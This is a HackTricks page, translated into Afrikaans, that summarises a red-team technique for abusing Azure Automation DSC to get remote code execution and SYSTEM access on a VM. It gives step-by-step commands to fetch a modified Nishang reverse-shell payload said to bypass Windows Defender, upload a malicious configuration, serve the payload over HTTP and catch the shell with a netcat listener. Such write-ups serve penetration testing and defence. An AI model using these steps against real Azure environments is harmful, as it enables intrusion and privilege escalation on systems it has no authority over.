Az - State Configuration RCE

Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Kyk die volledige berig by: https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe

Opsomming van Remote Server (C2) Infrastruktuurvoorbereiding en Stappe

Oorsig

Die proses behels die opstel van 'n afgeleë bediener-infrastruktuur om 'n gewysigde Nishang Invoke-PowerShellTcp.ps1 lading, genaamd RevPS.ps1, te huisves, wat ontwerp is om Windows Defender te omseil. Die lading word bedien vanaf 'n Kali Linux-rekenaar met IP 40.84.7.74 deur middel van 'n eenvoudige Python HTTP-bediener. Die operasie word uitgevoer deur verskeie stappe:

Stap 1 — Skep Lêers

  • Benodigde lêers: Twee PowerShell-skripte is nodig:

  1. reverse_shell_config.ps1: 'n Gewensde Staatkonfigurasie (DSC)-lêer wat die lading ophaal en uitvoer. Dit is beskikbaar by GitHub.

  2. push_reverse_shell_config.ps1: 'n Skrip om die konfigurasie na die VM te publiseer, beskikbaar by GitHub.

  • Aanpassing: Veranderlikes en parameters in hierdie lêers moet aangepas word aan die gebruiker se spesifieke omgewing, insluitend bronname, lêerpaie en bediener/lading-identifiseerders.

Stap 2 — Konfigurasie-lêer Zip

  • Die reverse_shell_config.ps1 word saamgedruk in 'n .zip-lêer, sodat dit gereed is vir oordrag na die Azure Storage-rekening.

Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip

Stap 3 — Stel Stoor Konteks & Laai op

  • Die saamgeperste konfigurasie lêer word geüpload na 'n vooraf gedefinieerde Azure Stoorhouer, azure-pentest, deur gebruik te maak van Azure se Set-AzStorageBlobContent cmdlet.

Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx

Stap 4 — Berei Kali-boks voor

  • Die Kali-bediener laai die RevPS.ps1-vragstuk af van 'n GitHub-opberging.

wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
  • Die skripsie word gewysig om die teiken Windows VM en poort vir die omgekeerde skulp te spesifiseer.

Stap 5 — Publiseer Konfigurasie Lêer

  • Die konfigurasie lêer word uitgevoer, wat daartoe lei dat die omgekeerde skulp skripsie na die gespesifiseerde plek op die Windows VM geïmplementeer word.

Stap 6 — Gasheer Lading en Stel Luisteraar op

  • 'n Python SimpleHTTPServer word gestart om die lading te gasheer, saam met 'n Netcat luisteraar om inkomende verbindinge vas te vang.

sudo python -m SimpleHTTPServer 80
sudo nc -nlvp 443
  • Die geskeduleerde taak voer die nut uit en behaal SYSTEM-vlak voorregte.

Gevolgtrekking

Die suksesvolle uitvoering van hierdie proses skep tallose moontlikhede vir verdere aksies, soos kredensiale-uitstorting of die uitbreiding van die aanval na verskeie VM's. Die gids moedig voortgesette leer en kreatiwiteit aan in die domein van Azure Automation DSC.

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

Last updated